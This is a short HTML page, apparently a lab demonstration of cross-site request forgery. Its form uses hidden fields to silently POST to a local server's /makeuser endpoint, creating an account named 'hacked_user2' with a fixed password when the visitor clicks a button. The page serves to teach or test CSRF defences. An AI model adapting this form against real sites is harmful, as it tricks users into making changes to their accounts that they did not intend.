<!doctype html>
<html lang="en">
    <head>
        <meta charset="UTF-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
        <title>CSRF Attack Demo</title>
    </head>
    <body>
        <h2>Click the button below to create a new user without CSRF</h2>
        <p>
            User name will be "hacked_user" and password will be "password123"
        </p>
        <form method="post" action="http://127.0.0.1:5000/makeuser">
            <input type="hidden" name="username" value="hacked_user2" />
            <input type="hidden" name="password" value="password123" />
            <input type="hidden" name="passwordcheck" value="password123" />
            <button type="submit">Click me</button>
        </form>
    </body>
</html>
